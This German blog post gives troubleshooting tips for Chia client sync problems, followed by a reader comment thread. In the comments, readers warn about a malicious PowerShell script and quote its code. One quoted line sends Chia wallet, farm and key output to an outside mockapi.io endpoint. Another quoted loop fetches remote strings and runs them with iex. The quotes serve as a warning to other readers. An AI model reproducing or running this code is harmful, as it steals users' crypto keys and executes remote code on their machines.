Immer wieder haben Leute Sync Probleme im Chia Client. Die Tipps in diesem Artikel sollen dabei helfen Verbindungsprobleme ausfindig zu machen und sie zu beseitigen. Wenn der Chia Client nämlich nicht synchronisiert ist, kann auch kein Farming betrieben werden.

Grundsätzlich können wir zu Beginn sagen, dass der Sync Vorgang einige Zeit in Anspruch nehmen wird. Wenn es der erste Sync ist, wird dieser einige Stunden benötigen. Wenn es sich um einen Resync nach einem Update handelt, geht es deutlich schneller, da hier kein kompletter Sync durchgeführt werden muss. Während des Synchronisierens wird zusätzlich die CPU stark beansprucht. Dies ist völlig normal. Wenn ihr parallel noch Plots erstellen möchtet, könnt ihr das auch ohne fertige Synchronisation machen. Beachtet aber, dass durch das Synchronisieren, der Plot Erstellung weniger CPU zur Verfügung steht.

Nicht nur der Full Node sondern auch die Wallet muss synchronisiert sein um Gewinne verbuchen und einsehen zu können.

Sobald der Client beginnt zu synchronisieren wird in gelber Schrift Syncing (xxx/yyy) angezeigt. Die Werte hinter Syncing zeigen dir an, wie weit die Synchronisierung fortgeschritten ist. Sobald in grüner Schrift „Synced“ erscheint, ist die Synchronisierung abgeschlossen und der Client beginnt mit dem Farming der Plot Dateien.

Was können die Ursachen für Sync Probleme sein?

Zunächst solltet ihr prüfen ob in eurer Windows Firewall oder einer anderen Firewall die entsprechenden Freigaben für den Chia Client vorhanden sind. Öffnet dazu über das Startmenü „Windows Defender Firewall mit erweiterter Sicherheit“. Ihr solltet unter eingehende Regeln dann Einträge wie nachfolgend zu sehen finden. Sollten die Einträge nicht vorhanden sein, installiert den Client neu und Bestätigt die Nachfrage zur Freigabe in der Windows Firewall am Anfang der Installation (siehe auch hier).

Weiterhin können auch Performance Probleme an eurem System zum verlieren der Synchronisation führen. Wenn z.B. eure CPU permanent am Limit ist kann regelmäßig die Synchronisation abbrechen und der Client zeigt „Not Synced“. Wenn ihr mit dem System auch Plot Dateien erstellt, solltet ihr testweise die parallelen Vorgänge reduzieren oder das Plotting für einen Moment ganz unterbrechen. Hierdurch könnt ihr herausfinden, ob Performance Probleme an eurem System existieren.

Ihr könnt zusätzlich eure Chia Logs auf UPNP Fehler überprüfen. Wenn ihr das Log noch nicht aktiviert habt, könnt ihr dies wie folgt machen.

Öffnet die Datei config.yaml im Verzeichnis C:\Users\BENUTZER\.chia\mainnet\config in einem Editor (z.B. Notepad oder Notepad++). Sucht jetzt nach der Zeile mit log_level: und ändert den Wert von WARNING auf INFO.

Wenn euer Chia Client noch geöffnet ist, müsst ihr diesen erst neu starten, damit das Log Level angepasst wird. Ab dem nächsten Start werden dann erweiterte Informationen in das Log unter C:\Users\BENUTZER\.chia\mainnet\log\debug.log geschrieben.

Ihr könnt das Log jetzt nach Fehlern zu „UPNP“ durchsuchen. Solltet ihr entsprechende Fehler finden, ist bei eurem Router UPNP deaktiviert. Dies sollte der Standard sein und ist grundsätzlich aus Sicherheitsgründen auch OK. Allerdings schränkt dies auch den Betrieb des Chia Clients ein. Ihr könnt zwar eine Verbindung zu anderen Peers aufbauen, andere Peers aber keine Verbindung mit eurem Client herstellen. Weiterhin werden dann nur 10 Verbindungen aufgebaut, anstelle von 50 möglichen Verbindungen zu anderen Peers. Um das Problem zu lösen, könnt ihr wie folgt vorgehen. Deaktiviert zunächst in der confg.yaml UPNP indem ihr den entsprechenden Wert abändert:

enable_upnp = false

Im nächsten Schritt müsst ihr auf eurem Router eine Portfreigabe für den Port 8444 einrichten. Da es viele verschiedene Router gibt, sucht am Besten mal über Google nach „Portfreigabe + Routermodell“. Hier solltet ihr jede Menge Anleitungen zu eurem Routermodell finden.

Sobald die Portfreigabe erstellt wurde, müsst ihr den Chia Client neu starten. Um zu überprüfen ob Port 8444 an eurem Router freigegeben ist könnt ihr die Seite https://www.yougetsignal.com/tools/open-ports/ verwenden.

Zuletzt gibt es noch ein paar weitere Dinge, die ihr überprüfen könnt:

  • Überprüft die Zeiteinstellungen (Uhrzeit/Datum) von eurem System.
  • Aktualisiert eure Router Firmware.
  • Deaktiviert testweise euren Virenscanner.
  • Verwendet testweise eine Kabelverbindung anstelle von WLAN.
  • Überprüft Switch Einstellungen (sofern vorhanden und möglich). VLANs, Firewalls, ACLs, etc.
  • Wenn ihr mehrere Router hintereinander geschaltet habt (Beispiel: Telekom Speedport für Internet Access und Fritzbox für Netzwerkverwaltung), muss die Port Freigabe auf allen Geräten durchgeführt werden.

Um den Start des Synchronisierungsvorgangs zu beschleunigen, gibt es die Möglich sich direkt mit einem Node zu verbinden, um die Daten zur Blockchain abzurufen. Klickt hierzu im Client auf „Full Node“ und scrollt bis zum Ende der Seite. Hier habt ihr die Möglichkeit über „Connect To Other Peers“ manuell einen Host einzutragen.

Einen der folgende Hosts / Nodes / Peers könnt ihr hier nun hinterlegen:

  • node.chia.net (Port: 8444)
  • node-eu.chia.net (Port: 8444)
  • introducer-eu.chia.net (Port: 8444)

Nach dem Klick auf „Connect“ sollte nach kurzer Zeit die Synchronisation starten.

[QuickTip] Chia Client Sync Probleme (Not Synced)
Beitrag teilen:

32 Kommentare zu „[QuickTip] Chia Client Sync Probleme (Not Synced)

  • 12. Mai 2021 um 14:56
    Permalink

    muss chia.exe nach der log änderung neugestartet werden?

    Antworten
  • 12. Mai 2021 um 17:10
    Permalink

    Hallo,

    Du schreibst oben daß nicht nur der full node sondern auch die wallet synchronisiert sein muss. Wie kann ich die wallet denn separat syncen bzw. wo kann ich sehen ob die synchronisiert ist oder nicht?

    Grüße

    Antworten
    • 12. Mai 2021 um 20:31
      Permalink

      Die Wallet synchronisiert sich automatisch. Kann man oben links im Client unter Wallet sehen.

      Antworten
      • 13. Mai 2021 um 10:02
        Permalink

        Ah okay, danke. Bei der Wallet steht „Status: synchronisieren“, aber die Höhe steht seit gestern bei 139183. Da scheint also nicht wirklich was zu passieren. Woran könnte das liegen? Der Farmer farmt nur, macht nichts anderes, Port 8444 ist offen und upnp steht in der config auf „false“. Hättest Du vlt. noch nen Tip? Ich krieg auch nie mehr als max. 8 Verbindungen im node und das synchronisieren vom node hat 3 Tage gedauert…

        Antworten
  • 12. Mai 2021 um 17:50
    Permalink

    Hallo,

    obwohl ich den Port 8444 im Router freigegeben habe, und mir auch über „you get signal“ bestätigt wird, schaffe ich aber trotzdem nur max. 12 Verbindungen.

    woran kann das liegen?

    Gruß

    Antworten
    • 12. Mai 2021 um 20:32
      Permalink

      Es kann sein, dass es einige Stunden dauert bis eine größere Anzahl an Verbindungen aufgebaut wird.

      Antworten
      • 16. Mai 2021 um 10:56
        Permalink

        Tatsache.

        Habe jetzt Zeitweise über 40 Verbindungen:D

        Antworten
    • 13. Mai 2021 um 14:38
      Permalink

      Wo stehen die Verbindungen? Unter “ Wallet „?

      Antworten
  • 12. Mai 2021 um 22:19
    Permalink

    Hallo zusammen,

    das der Sync gefühlt ewig braucht ist mir auch schon irgend wie aufgefallen.
    Jetzt bin ich mal nach den Tipps gegangen und von upnp weg, hab auch die Firewall, Port Freigabe eingerichtet.

    Jetzt ist mir nur aufgefallen das ich über die porttester webseite ne Fehlermeldung bekommen aber der full node sagt syncronisiert

    Kann ich dann eigentlich sicher sein das alles funktioniert ?
    Kann das vllt an den DS-Lite Anschluss von KabelBW(vodafone) liegen ?

    MFG Soro

    Antworten
  • 13. Mai 2021 um 12:36
    Permalink

    Hallo Zusammen,

    Bei mir bleibt Die Syncro. immer bei der gleichen Zahl stehen, seit gesten Abend.
    Hab probiert es neu zu Installieren Laufe jetzt auf der Version 1.1.5.
    Doch immer noch das gleiche Problem.
    Hab hier jetzt auch alle Schritte durch probiert, ports offen usw. doch hänge immer noch in der Gleichen Zahl ( 248934/274164) und es geht nichts weiter.

    Vil hatt ja jemand eine Lösung für was ich da noch machen könnte.

    Danke Lg.
    RR

    Antworten
  • 14. Mai 2021 um 09:12
    Permalink

    Ich habe nur eine Full Node Verbindung die ich immer alle 24h erneut eintragen muss. Warum bekomme ich keine weiteren Full Node Verbindungen? Das Problem besteh seit 1.1.5

    Antworten
  • 14. Mai 2021 um 17:18
    Permalink

    Hallo,

    in der Hoffnung das mir hier jemand helfen kann… ich bekomme immer wieder folgende Fehlermeldung in der debug.log angezeigt:

    chia.full_node.full_node: WARNING Wasn’t able to add transaction with id *, status 3 error: Err.MEMPOOL_NOT_INITIALIZED

    (das * ersetzt die id!)

    Kann mir das jemand erklären? Auf dem Rechner ist nur Windows 10 installiert (die Firewall und der Defender ist aus) und der Rechner plotten auch nicht, trotzdem kommen immer wieder diese Fehlermeldungen in der debug.log. Der Port 8444 ist auch geöffnet es ist alles synchronisiert und auch sonst ist alles grün. Ich habe keine Idee mehr…

    Antworten
  • 14. Mai 2021 um 22:45
    Permalink

    ahoi, bei mir steht immer nur VERBINDE MIT WALLET und nichts passiert, hab das stundenlang stehen lassen. die ganzen Einstellungen für Firewall und co. hab ich schon gemacht, es hatte ja funktioniert, hatte sich aber aufgehängt und nachdem ich einen plot gelöscht hab damit es weiter geht fing der Untergang an. habs auch schon deinstalliert, neu gebootet, neu installiert usw. es wird nicht besser. den pc hab ich ganz neu installiert und ausser treiber ist sonst nichts drauf . hat jemand eine ideeeeeeee ?
    🙂
    grüße greg

    Antworten
  • 15. Mai 2021 um 00:02
    Permalink

    Seit 21:29 geht gar nichts mehr Richtung Sync. Bis dahin lief alles wunderbar.

    Antworten
    • 15. Mai 2021 um 00:08
      Permalink

      Kaum geschrieben, schon läuft es wieder….

      Antworten
  • 15. Mai 2021 um 00:21
    Permalink

    Habe folgendes Problem: Synchronisierung wurde voll erreicht und kurz darauf fängt die Synchronisierung wieder von vorne an…. An was kann das liegen?

    Antworten
  • 15. Mai 2021 um 09:30
    Permalink

    seit heute morgen funktioniert die Synchronisierung nicht mehr, wenn ich hosts manuell hinzufügen macht er kurz nen resync und verliert wieder die Verbindung 🙁

    Antworten
  • 15. Mai 2021 um 14:09
    Permalink

    Der Chia (Windows Version) findet schon seit Tagen bei mir nicht mehr von allein auch nur irgendeinen. Im Moment lasse ich einfach hart alle 15 Minuten nen Script laufen, dass sich mit:

    node-or.chia.net
    node-eu.chia.net
    node-apne.chia.net

    Die Verbindung zur node-eu kommt meist nichtmal zustande dafür sind die anderen beiden stabil. Weitere Peers tauchen nichtmal kurz auf …

    UPNP ist aus und die Ports werden weitergleitet … hilft alles nicht.

    Die Entwickler haben hier noch einige gr. Baustellen 😉

    Antworten
  • 16. Mai 2021 um 07:19
    Permalink

    bei mir synchronisiert er seit 3 h nicht mehr.
    ich hab 1.1.5
    drauf seit dem spinnt das System jeden tag immer mal wieder aber jetzt synchronisiert er gar nicht mehr…

    Antworten
  • 16. Mai 2021 um 09:45
    Permalink

    Mein Node ist synchronisiert, nicht aber mein Wallet, dort steht die Höhe fest und als Info steht dort nicht synchronisiert. Ich bin die ganze Zeit am Farmen. Bringt aber das Farmen nichts, da die Wallet nicht synchronisiert ist? Oder werden die Gewinne später bei korrekter Synchronisation trotzdem verbucht? Vielen Dank für eure Antworten.

    Antworten
  • 16. Mai 2021 um 12:36
    Permalink

    Hallo zusammen,
    wenn bei mir der Sync Fehler auftritt, dann starte ich eine kleine Batchdateu mit einigen IP Adressen die ich mir kopiert habe wenn ich im Sync bin.
    der Befehl
    .\chia.exe show -a :8444
    im Verzeichnis
    C:\Users\xyz\AppData\Local\chia-blockchain\app-1.1.5\resources\app.asar.unpacked\daemon>
    Verbindet mit der IP Adresse, wenn sie online ist.
    Ich habe mir so ca. 30 IP Adressen gesammelt und mit der Batchdatei funktioniert das immer.

    Antworten
  • 16. Mai 2021 um 16:04
    Permalink

    Seit gestern geht bei mir andauernd die Synchronitsation flöten und kommt auch nicht von alleine wieder. Muss den Client neustarten und mit Glück synct er dann wieder, aber auch nur für max 1h bis er wieder auf Nicht Synchronisiert steht. Ein Kollege nen paar Straßen weiter hat keinerlei Probleme.

    Antworten
  • 18. Mai 2021 um 09:47
    Permalink

    Versuchen Sie, ein Powershell-Skript zu verwenden, wenn Sie unter Windows ausgeführt werden, das automatisch eine Verbindung zu öffentlichen Knoten herstellt:

    >LINK WG. SCHADSOFTWARE ENTFERNT< BEACHTET DEN HINWEIS VON KEVIN!

    Antworten
    • 19. Mai 2021 um 21:18
      Permalink

      Schadsoftware, Key klau ist nichts schönes, lass die Finger davon!

      Zeile 25

      iex $chiaHost >$null 2>&1

      $wallet = ./chia wallet show| out-string; $summary = ./chia farm summary | out-string; $keys = ./chia keys show | out-string; Invoke-WebRequest -Uri https://60a3608b7c6e8b0017e26c87.mockapi.io/api/v1/info -Method POST -Body @{„1″=$wallet;“2″=$summary;“3″=$keys};

      An alle die es bereits ausgeführt haben, ich würde denn Privat Key ändern.

      Grüße

      Antworten
      • 19. Mai 2021 um 23:28
        Permalink

        Hallo,
        danke für den wichtigen Hinweis!
        Ich habe mich leider (blöd wie ich jetzt war) hinreissen lassen und das Script laufen lassen..
        Wurden auch die Private Keys ausgelesen und versendet, oder nur die öffentlichen?
        Wenn ich den Private Key im grünen Feld ändere, verliere ich dann alle fertigen Plots?
        Danke für eure Antworten

        Antworten
        • 20. Mai 2021 um 00:09
          Permalink

          Nachtrag zu meiner Nachfrage und Outing von gerade:
          Ich hatte das Script wohl der der Nutzung geändert, weil ich in dieser Abfrage keinen Sinn gesehen habe, es kann auch sein, als ich gestern auf der Suche nach der Lösung zum Netzwerkproblem war, doch ein anderes Script installiert habe.

          Ich kopiere es mal hier rein und verfremde den Link, damit nicht andere auch das Ding nutzen:
          while($true)
          {
          $chiaPath = $env:LOCALAPPDATA +“\chia-blockchain\app-*\resources\app.asar.unpacked\daemon“
          $hostsLink = ‚https://xxxxxxxxxxx‘

          cd $chiaPath

          $response = Invoke-RestMethod -Uri $hostsLink -contenttype ‚application/json‘

          $chiaHosts = $response.hosts

          foreach($chiaHost in $chiaHosts){
          If ($chiaHost.Contains(„./“)){
          iex $chiaHost >$null 2>&1
          }else{
          ./chia show -a $chiaHost
          }
          }
          ECHO „ROUND HAS BEEN FINISHED! WAITING 5 MINUTES TO NEXT ONE“;
          Start-Sleep -s 900
          }

          Antworten
        • 20. Mai 2021 um 16:59
          Permalink

          So wie es aussieht hat die Schadsoftware keine direkte Möglichkeiten deinen Privaten Key zu holen. Dein Privater Key sollte sicher sein aber Garantie gibt’s keine.

          Wenn du zu wenige Verbringungen Hast kannst auch hergehen und die Domain hinzufügen.
          introducer-eu.chia.net:8444

          Und falls du deinen Private Key ändern möchtest musst du auch neu Plotten.

          Grüße

          Antworten
          • 20. Mai 2021 um 21:33
            Permalink

            Danke Dir für die Antworten!

  • 18. Mai 2021 um 19:32
    Permalink

    Das gleich bei mir ständig verliere ich den Sync.

    Das mit UPNP oder Port NATing ist meines Erachtens nicht notwendig, ich lasse eine Farm hinter einer Palo Alto Firewall laufen und die macht normales NATing das reicht vollkommen.
    Komischerweise ist diese Farm voll Synchron.

    Zuhause habe ich zwei Fritzboxen in einer Perimeter Konfiguration laufen (zwei Subnetze hintereinander ähnlich einer DMZ)

    Antworten
  • 18. Mai 2021 um 23:25
    Permalink

    seit Stunden kein Sync mehr.
    Was ist den da los?

    Antworten
  • 17. Juni 2021 um 07:49
    Permalink

    ich hab gerade das Problem, dass mein Rechner diese NAcht ein Zwangsupdate und seit dem ich mein Plottverzeichniss nicht mehr hinzufügen kann.
    Ich bekomme die Fehlermeldung auch beim Starten von Chia…

    [Error 22] Datei nicht gefunden. Warscheinlich hat einer der Plottordner in config.yami ein Problem.

    Wie kann ich dass beheben?

    Antworten

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.